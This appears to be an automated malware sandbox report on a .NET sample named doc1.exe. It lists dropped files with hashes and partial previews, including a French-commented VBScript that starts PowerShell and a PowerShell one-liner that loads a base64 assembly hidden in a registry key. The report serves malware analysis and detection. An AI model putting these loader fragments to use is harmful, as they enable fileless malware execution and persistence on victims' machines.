                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF565d40.TMP (copy)

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.724700997052021
                          Encrypted:false
                          SSDEEP:96:tyi3CLT9kvhkvCCt3rZ8X2zHYrZ8X2BHA:tyTF3rZSNrZSt
                          MD5:ADE0008792CFA0A656D421CB90D2FE99
                          SHA1:0B09926CEA635AF41556AC19E4B7FA0237BC159D
                          SHA-256:1347162096E503325C8FB2CBD1D4F7E1C587BDB59562056F3B81982CEE7C3EEC
                          SHA-512:3AAC4D081E76956AE7C9C917848E738882CD474C74E13C4AEBDDF116F096E77CC2618546F27D6BCCC81186AA21610C26710FC98F8218C7BD5EE33A985AF91546
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S.....pe....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W....QU.e........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.YY.....2.......................L.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF569b43.TMP (copy)

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.724700997052021
                          Encrypted:false
                          SSDEEP:96:tyi3CLT9kvhkvCCt3rZ8X2zHYrZ8X2BHA:tyTF3rZSNrZSt
                          MD5:ADE0008792CFA0A656D421CB90D2FE99
                          SHA1:0B09926CEA635AF41556AC19E4B7FA0237BC159D
                          SHA-256:1347162096E503325C8FB2CBD1D4F7E1C587BDB59562056F3B81982CEE7C3EEC
                          SHA-512:3AAC4D081E76956AE7C9C917848E738882CD474C74E13C4AEBDDF116F096E77CC2618546F27D6BCCC81186AA21610C26710FC98F8218C7BD5EE33A985AF91546
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S.....pe....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W....QU.e........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.YY.....2.......................L.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF56d9f2.TMP (copy)

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.724700997052021
                          Encrypted:false
                          SSDEEP:96:tyi3CLT9kvhkvCCt3rZ8X2zHYrZ8X2BHA:tyTF3rZSNrZSt
                          MD5:ADE0008792CFA0A656D421CB90D2FE99
                          SHA1:0B09926CEA635AF41556AC19E4B7FA0237BC159D
                          SHA-256:1347162096E503325C8FB2CBD1D4F7E1C587BDB59562056F3B81982CEE7C3EEC
                          SHA-512:3AAC4D081E76956AE7C9C917848E738882CD474C74E13C4AEBDDF116F096E77CC2618546F27D6BCCC81186AA21610C26710FC98F8218C7BD5EE33A985AF91546
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S.....pe....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W....QU.e........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.YY.....2.......................L.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF571da2.TMP (copy)

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.724700997052021
                          Encrypted:false
                          SSDEEP:96:tyi3CLT9kvhkvCCt3rZ8X2zHYrZ8X2BHA:tyTF3rZSNrZSt
                          MD5:ADE0008792CFA0A656D421CB90D2FE99
                          SHA1:0B09926CEA635AF41556AC19E4B7FA0237BC159D
                          SHA-256:1347162096E503325C8FB2CBD1D4F7E1C587BDB59562056F3B81982CEE7C3EEC
                          SHA-512:3AAC4D081E76956AE7C9C917848E738882CD474C74E13C4AEBDDF116F096E77CC2618546F27D6BCCC81186AA21610C26710FC98F8218C7BD5EE33A985AF91546
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S.....pe....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W....QU.e........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.YY.....2.......................L.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5BVTADRV8HYLQP5LWUTK.temp

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.725292033384712
                          Encrypted:false
                          SSDEEP:96:jf/3CLT9kvhkvCCt3rZ8X2BHYrZ8X2BHA:jfcF3rZS/rZSt
                          MD5:F03805FFF47AB156E697543B9BEE061F
                          SHA1:2BB8E451DC17928D9410AA2EF3031AC388D40C8F
                          SHA-256:B607E1C87D2ED38A53831F311E5E5FEBCF418AD924195C6AB944A3576CFFB20B
                          SHA-512:3AEA22DB4D21F16FE9E6DAE7759352612AE1B5C4AED92FA14FE66105807E98DC072EC9456FA24E400B8CD19E6F22D5EFE52B2ED72A25119448239934ED28A84F
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S...{..e....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W.....@d.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Yl...Windows.@......EW<2.Yr.....2.....................KZ .W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Yj.....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6PA8S796JYOGKJ8YURG4.temp

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.7251830332224074
                          Encrypted:false
                          SSDEEP:96:ef/3CLT9kvhkvCCt3rZ8X2BHYrZ8X2BHA:efcF3rZS/rZSt
                          MD5:9E87AFC5F134A6452690BAE2DECD0F39
                          SHA1:224B4F6FDC2C7B3669C259E967DBD2EE7BFC9C56
                          SHA-256:7930D56A8E01C1C14F62CF2BD496B7AF676BAF29D674B865641BFE7C7C556DBD
                          SHA-512:E3A73F04E4B4E127F7F0420B235A4D99B9343C73B3C6220F18DD91261EB40B0DA148088FE171BD5D5D92601C183AA5EF999E22B67D15FF0F1E15FBF4E4884798
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S...{..e....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W....d.+x........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Yl...Windows.@......EW<2.Yr.....2.....................KZ .W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Yj.....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C4U4PU4G3ZTYT9N6BAR3.temp

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.7261790433966007
                          Encrypted:false
                          SSDEEP:96:4f/3CLT9kvhkvCCt3rZ8X2BHYrZ8X2BHA:4fcF3rZS/rZSt
                          MD5:818A10E672C425DC06DD9C98F2E4AABA
                          SHA1:322630CB1DF039FC149B30E5F06DCD9CED5A3964
                          SHA-256:B813B61F513423F9BBCE15BD3F570912B770EA262D9FE6D2E9C3909464B7D363
                          SHA-512:3E804C5F60E43EF239D75D1EB91BEA4C44797CE61AACA2118F7F027991808107A7CBABF3EF14E6887794AA02EAD41A9C8A3FFF9C7834EFB993363CCB7B11FE9D
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S...{..e....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W.....Zy.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Yl...Windows.@......EW<2.Yr.....2.....................KZ .W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Yj.....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MB0FFM5BGMWYG1V7S2VA.temp

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.7269884879991744
                          Encrypted:false
                          SSDEEP:96:If/3CLT9kvhkvCCt3rZ8X2BHYrZ8X2BHA:IfcF3rZS/rZSt
                          MD5:A84F947FDF42CEB6F87DEF445E3BF063
                          SHA1:521BD5B805600A97AA052E00619EB2DC05A71F5F
                          SHA-256:5EFD48D90803B2AC00B17DCE415F7EA67A2CBE63D4CA0B95BD89F8FB3A335097
                          SHA-512:8E9B8491247666998727B7E31C49509855D0EAD2B2F495EEE7E6D2029B2C06E02C2D930F11A731A631F7160B409D93CD00923463207B6E6E241EC2246504384C
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S...{..e....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W......G.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Yl...Windows.@......EW<2.Yr.....2.....................KZ .W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Yj.....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PH3V7OUOZ3FWWTO0KHLX.temp

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.727304179071042
                          Encrypted:false
                          SSDEEP:96:ayi3CLT9kvhkvCCt3rZ8X2BHYrZ8X2BHA:ayTF3rZS/rZSt
                          MD5:B4BD11194E92BE898681B7C2470A2D5E
                          SHA1:87906D565191197CFF8CFB74B584456B4AE687EB
                          SHA-256:D98515EE93DBDFA25F6A62F7F68FB566A56C7EBED45157F11D808E609CB5CBDA
                          SHA-512:DF43FB0B883A35A94CEB9F468A9027E9293B348F013E5E811BA0F8D8AD336520C893C58AAEF053AB844570A709A055B7A61EA482019FC6629029466FAD674445
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S...{..e....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W.....".n........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.YY.....2.......................L.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Yj.....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VACGQUYUXTWP9II47VG9.temp

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.724700997052021
                          Encrypted:false
                          SSDEEP:96:tyi3CLT9kvhkvCCt3rZ8X2zHYrZ8X2BHA:tyTF3rZSNrZSt
                          MD5:ADE0008792CFA0A656D421CB90D2FE99
                          SHA1:0B09926CEA635AF41556AC19E4B7FA0237BC159D
                          SHA-256:1347162096E503325C8FB2CBD1D4F7E1C587BDB59562056F3B81982CEE7C3EEC
                          SHA-512:3AAC4D081E76956AE7C9C917848E738882CD474C74E13C4AEBDDF116F096E77CC2618546F27D6BCCC81186AA21610C26710FC98F8218C7BD5EE33A985AF91546
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S.....pe....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W....QU.e........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.YY.....2.......................L.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........

                          C:\Users\user\AppData\Roaming\bosotkm.exe

                          Download File
                          Process:C:\Users\user\Desktop\doc1.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):1118840
                          Entropy (8bit):7.84182618843344
                          Encrypted:false
                          SSDEEP:24576:ZlmXjCShkN8Hy//wZhBcV7ilbN1/39e48e:ZlmXjCJN8SXwVL1/9e48e
                          MD5:FDDD99D918C32A807CD1761C519B086B
                          SHA1:8CF7E4C454F20D2AB851BB6E18A4250B7AF4157C
                          SHA-256:5CD8E28712872382CACAC0D338A4D041E291B89D41A4DAF69EABEFE7EC46F920
                          SHA-512:5243BA74B6919A3D96DFFDA1A598C47A3CE80426136ABE769FA19BF9A138DE64A7DB87EFB2A5CFE6C7BB1E5BDC8655169DEFE54EE79D3D7EBE16817807EBB06A
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 53%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7..f................................. ........@.. .......................@............`.................................T...W.......................x.... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......\....8..........t.....................................................@.......A.......A......@.......A......@......@.......A.......A......@......@.......A......@.......A.......A......@....0.1A..3...@2.6....@7...5.4A..<....@=...?.>A....:.;A..9....@8.(...@)...+.*A....../A..-...@,...$.%A..'...@&."...@#...!. A....`.aA..c....@b.f....@g...e.dA..l....@m...o.nA....j.kA..i....@h.x....@y...{.zA....~..A..}....@|...t.uA..w....@v.r....@s...q.pA..P....@Q...S.RA....V.WA.

                          C:\Users\user\AppData\Roaming\bosotkm.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\doc1.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs

                          Download File
                          Process:C:\Windows\SysWOW64\wscript.exe
                          File Type:ISO-8859 text
                          Category:dropped
                          Size (bytes):2108
                          Entropy (8bit):4.910710452068364
                          Encrypted:false
                          SSDEEP:48:NmVsWD6IIWZrMnPmklEX/AEdFJJmqgjHjJvRWggnf9BxZRmz6/u4q:NmVLQk27vWnfVZxuV
                          MD5:5F8C9EAA961FD5CEABEB785D2427CC0C
                          SHA1:D44CB5B6D0715D2D1027A345AC30010C69A9CCD7
                          SHA-256:E205AA6B623C2A0CCFA28517C29E665B2E3B75CC7B2C22DB2B6F61DD00893F87
                          SHA-512:50435E2B26A49D4F6071783E78602E48DFD1AE8DD85E7ABDFD93ACFA4402F400AE9D4E6509FF24D1EF2B96B13C415787EC2BE4D10BB5428424F41A2E06B912E8
                          Malicious:true
                          Preview:Option Explicit.'Nom du projet: fNUATsLGslepRpn.' Initialisation des objets et variables.Dim gestionnaireShell, repertoireSysteme, iteration.Set gestionnaireShell = CreateObject("WScript.Shell").repertoireSysteme = gestionnaireShell.ExpandEnvironmentStrings("%windir%")..' Fonction pour v.rifier l'ex.cution d'un processus.Function ProcessusEstActif(nomDuProcessus). Dim gestionnaireWMI, listeDesProcessus. Set gestionnaireWMI = GetObject("winmgmts:\\.\root\cimv2"). Set listeDesProcessus = gestionnaireWMI.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & nomDuProcessus & "'"). . ProcessusEstActif = (listeDesProcessus.Count > 0).End Function..' Proc.dure pour ex.cuter des commandes PowerShell.Sub LancerCommandesPowerShell(). Dim listeDesProcessus, processusActif. . ' Ex.cuter PowerShell avec une fen.tre normale. gestionnaireShell.Run repertoireSysteme & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2. . ' Rechercher le processus PowerShell et ex.cu

                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                          Download File
                          Process:C:\Windows\System32\svchost.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):55
                          Entropy (8bit):4.306461250274409
                          Encrypted:false
                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                          Malicious:false
                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                          \Device\ConDrv

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with very long lines (875), with CRLF line terminators, with escape sequences
                          Category:dropped
                          Size (bytes):1685
                          Entropy (8bit):4.518193649342236
                          Encrypted:false
                          SSDEEP:48:E/WxZzrWxZzrfXWjAX+X5XpXKX/XFXoXQXDX5:E/EZzrEZzrfXWj4
                          MD5:4F176405CBAEF5D68CD6C9C5133F4C5E
                          SHA1:E349016A415A74E70F427B4F81DBCF2A4B43C3E7
                          SHA-256:4DF92808FB1E0C12B3B3A292886741F1E3172DF6E7CED4DB19D27C7B89BB57BD
                          SHA-512:D4BDE7B7A20FD0FBD309F74014FA1584B5AA9CC6B146DAB164AF9AB88D3014F9F4A0FC34A2844E21C297CD058C45A11FE9B81E464392552BCC4E1A552EB9D750
                          Malicious:false
                          Preview:.[91m> .[0m.[93m[.[33m.[45m.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\fNUA.[33m.[45m.[0m.[33m.[45m> .[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\fNUATsLGslepRpn'.[33m.[45m .[90m-Name.[33m.[45m .[36m's'.[33m)..[97ms.[33m.[45m .[33m|.[33m.[45m .[93mForEach-Object.[33m.[45m .[33m{.[92m$_.[33m[.[97m-1.[90m..-.[33m(.[92m$_.[33m..[97mLength.[33m)]})));.[33m.[45m .[33m[.[37ma.a.[33m]::.[97ma.[33m(.[36m'fNUATsLGslepRpn'.[33m).[0mstep 1..etape 2...[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconho.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhos.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.84182618843344
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          • Win32 Executable (generic) a (10002005/4) 49.97%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:doc1.exe
                          File size:1'118'840 bytes
                          MD5:fddd99d918c32a807cd1761c519b086b
                          SHA1:8cf7e4c454f20d2ab851bb6e18a4250b7af4157c
                          SHA256:5cd8e28712872382cacac0d338a4d041e291b89d41a4daf69eabefe7ec46f920
                          SHA512:5243ba74b6919a3d96dffda1a598c47a3ce80426136abe769fa19bf9a138de64a7db87efb2a5cfe6c7bb1e5bdc8655169defe54ee79d3d7ebe16817807ebb06a
                          SSDEEP:24576:ZlmXjCShkN8Hy//wZhBcV7ilbN1/39e48e:ZlmXjCJN8SXwVL1/9e48e
                          TLSH:DC35E185269C4D67FEE93A3494B22D1C2E297F83B83DB28F714DB0981863F44D591F26
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7..f................................. ........@.. .......................@............`................................

                          File Icon

                          Icon Hash:16832c2c2e2d4797

                          Static PE Info

                          General

                          Entrypoint:0x4feeae
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66CD0037 [Mon Aug 26 22:22:47 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
